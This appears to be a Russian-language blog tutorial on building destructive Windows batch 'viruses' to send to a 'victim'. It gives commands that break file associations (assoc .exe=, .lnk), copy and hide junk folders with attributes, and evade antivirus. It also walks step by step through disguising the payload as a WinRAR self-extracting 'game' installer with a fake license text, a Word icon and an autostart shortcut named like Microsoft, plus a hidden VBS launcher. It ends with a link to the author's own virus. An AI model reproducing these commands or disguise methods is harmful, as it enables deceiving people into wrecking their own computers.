допустим мы создадим 100 пустых папок в папке “Автозагрузка” и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их закрывая…
Удалим расширение
Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно вы только представьте чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…
assoc .lnk=.avi
здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!
assoc .exe=.avi
тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…
можно же просто удалить расширение, не заменяя его на другое:
assoc .exe=
после знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик.
Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые)
В таблице я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои.
Приложение .exe .com
Текстовые файлы doc .txt .wp .diz .log .wri
Музыкальные файлы .mp3 .wav .avi .wmv .mpg
Картинки .bmp .jpg .gif .tif .pic
Ярлыки .lnk .url
Архиваторы .rar .zip .arj .cab lzh.
Шрифты fon .ttf .atm
Файл реестра .reg .key
Системные файлы .sys .dll .rnf .drv .ega
Файл справки .chm .hlp
Можно путь для копирования поставить другой путь:
copy C:*.* C: program наш никчёмный файл появиться на диске С:
можно скопировать, что-нибудь другое:
copy C:windowssystem32*.* C:Microsoft*.exe
Видно что все файлы будь это текст, или музыка мы сохраняем как пиложение *.exe. Но это уже очень длительный процесс (копировать всё из system32) придется приукрасить программу. Cмотри главу: “Создаём эффект программы” Есть другой способ копирования:
dir c: /s/a > C:/1.txt
Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:
copy C:WINDOWS*.txt + C:WINDOWSHelp*.* KYSOK
Мы видим что я беру из папки “Windows” все текстовые файлы а из папки “Help” вообще все файлы и слепливаю кусок из всех них в файл “KUSOK” (од даже будет без расширения, но можно его и сделать, если пожелаете)
А можно полностью скопировать папку “system32″ в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.
xcopy C:WINDOWSWeb C:mysor /q /e /h /y копируем папку web в папку musor.
attrib +h +s C:/mysor всё скрываем с глаз людских.

——————————————————————————–
Если посмотреть то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, зачем нам вопросы вот мы влепили параметр /y.
——————————————————————————–

Ах, совсем забыл, не пишите вот такую команду:
copy C:*.* C:Windows
А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.
Можно оповещать нашу жертву о ходе действия нашего вируса.
для этого есть команда msg * Подождите программа выполнит соответствующие операции или както так короче можно написать чо чочеш
Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:
echo >> read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.
start/max read.txt
Тут так же действует вывод сообщения но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно отвлекаться.
Можно остоновить выполнение нашего вируса хитрой командой. Вылетит собщение “Для продолжения нажмите любую клавишу…”.
pause
Красивая оболочка
Ну, вот мы отослали наш с вами готовый вирусик вашему «другу», а он его не открыл т.к. у него появились сомнения на счёт такого странного файла и весит он мало и значок не внушает доверия и расширение какое-то странное… Мы немного постараемся исправить положение улучшив вид нашей ложной программы, это как бы вторая часть главы «Создаём эффект программы». Кстати говоря, я вот такое улучшение употреблял ко всем своим тупым вирусам и вам советую. Правда улучшать нам поможет WinRAR-это самый знаменитый архиватор.
Первым делом открываем WinRAR (его можно скачать тут
http://www.rarlab.com
http://www.rarsoft.com)
Рассматривать архиватор мы будем на примере создания вируса, который вырубает комп после включения, помните? Да ещё сделаем так, чтобы при следующем включение он опять таки отключался!
Берём уже заранее заготовленный файл отключения через x секунд, оттаскиваем в открытое окно архиватор и бросаем его туда. Тут же вылетает окно «Имя и параметры архива» тут можно указать «Степень сжатия» указать «Имя архива» а мы просто ставим галочку на квадратик «Создать SFX-архив» можно тут же заметить, что расширение меняется на .exe это значит, что мы делаем настоящее приложение! Заходим на страницу «Дополнительно» и нажимаем кнопку «Параметры SFX» вылетает окошко «Дополнительные параметры SFX» Под полем «Путь для распаковки» можно поставить, чтобы ваш файл распаковался в папку «Program Files» или создать его в «Текущей папке» то есть там, где будет запущен наш вирус, в самом поле «Путь для распаковки можно даже не чего и не писать. А вот в поле «Выполнить после распаковки» надо написать имя нашего файла с расширением, например: virus.bat (вот собаки ещё расширение им указывай! Кстати это мы сделали, для того чтобы непосредственно, после того как мы откроем (архив) вирус он автоматически запуститься, и отключал систему, или там сотрет, что-нибудь «ненужное»). В поле «Выполнить до распаковки» не чё писать не надо. На вкладке «Дополнительно» нажимаем кнопку «Добавить ярлык…» вылетает новое окно, где написано «Место создания ярлыка» ставим пометку «В папке Автозагрузка» (можно и в «Меню Пуск» и «На рабочем столе» но нам надо, чтобы при включении комп вырубался снова ведь так»).
——————————————————————————–
И поэтому когда при следующей загрузке компа система начнёт загружать элементы «Автозагрузки» то само собой загрузит, и наш файл и делать нечего отключит комп снова! Правда обводка тут слишком проста, когда идёт сама загрузка, просто держите нажатой клаву «Shift» и ком автоматически обойдёт элементы «Автозагрузки» и соответственно не отключиться, но не все это знают!

——————————————————————————–
В поле «Имя файла, для которого будет создан ярлык» пишем имя нашего файла, например virus.bat ну и ещё и в поле «Имя ярлыка (файла .lnk):» пишем, что вашей душе угодно (можно конечно написать что-нибудь такое типа: «Microsoft» или «Intel» и тогда это будет выглядеть более убедительно чем «Отключение») и всё, больше не чего не пишите разве можно написать в поле «Описание ярлыка», что-нибудь такое: «Not to delete» или «System file» ну чтобы придать немного сомнения. Подтверждаем ОК.
На странице «Режимы» где написано «Режим ввода информации» можно поставить пометку «Скрыть всё» и тогда при распаковки ни кто не чего у вас не спросит, а просто распакует и всё. Я советую поставить пометку «Не показывать начальный диалог» и тогда наша программа ни будет нас спрашивать, куда установить наш файл, а просто покажет лицензию, которую мы с вами щас и напишем. Ах да где написано «Режим перезаписи» ставим пометку «Перезаписывать без подтверждения».
На странице «Лицензия» в поле «Заголовок окна с лицензией» пишем название, например «Игра» если вы косите под игру, или «garbage collector» чтобы совсем запутать. В поле «Текст лицензии» вешаем лапшу на уши и даём волю своей фантазии ну, например:
Сейчас работает мастер установки игры «pirate». Это длительный процсс и отмена операции может повредить. Пожалуйста внимательно прочитайте, что будет написано ниже для полноправного использования данной продукцией:…тру ля ля.…ля ля… Ну там лечите дальше сколько душе угодно, это для того чтобы не оставить не малейшего сомнения на счёт происхождения и назначения программы, и вот ещё пожалуйста пишите без ошибок, а то вас тут же раскусят!
На странице «Текст и значок» не чего не следует писать, так этого программа не покажет из-за того, что мы поставили отметку «Не показывать начальный диалог» если её не поставить, то и тут можно накуролесить всякой ахинеи. Правда следует воспользоваться ещё одним маневром, где написано «Значок SFX-архива» можно я бы сказал нужно выбрать хоть какой-нибудь значок, а то жертву может отпугнуть значок который подставиться по умолчанию. А если загружить привычный значёк “WORD(а)” или картинки, то жертва без малейших подозрений с радостью запустит… хм… вот. И ещё можно загрузить какую-нибудь картинку «по теме конечно» и тогда она будет отображаться при чтении лицензии (это красивый эффект). Ну, вот, пожалуй, и всё если всё грамотно и правильно сделать, то у жертвы не будет и малейшего сомнения, что у него в руках лицензионная игра, ну а когда он её распакует, обрадуется, так что придётся переустанавливать систему!
Надо было написать это в главе «Отключение» но тогда мы не знали этих команд. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит многократное выключение не удаться:
Chcp 1251
cd “%USERPROFILE%Главное менюПрограммыАвтозагрузка”
attrib +h
вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.
Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала просто убрала все элементы и как будто их и не было.
Но и тут есть запара жертва открывает вир видит выскакивает окно
жертва быстринько его закрывает и всё вир не сработал но я нашёл способ чтоб окно не открывалось нужно вписать скрипт в самораспоковуйщийся архив
и имно его архив и должен открыть а скрипт этот мы будем писать на vbs его можно создать в блокноке а прописывать мы там будем
Set WshShell = WScript.CreateObject(”WScript.Shell”)
WshShell.Run”C:sistem32Connect.bat “, 0, true
Как видете тут указан путь к виру я не ззнаю какой путь будет у вас но в моём вире он такой какой я покозал
ну вот в принцепи и всё а мой вир вы можете скачать с http://depositfiles.com/files/k5dt7te0g
если чтото не поняли пишыте в коментарии я отвечу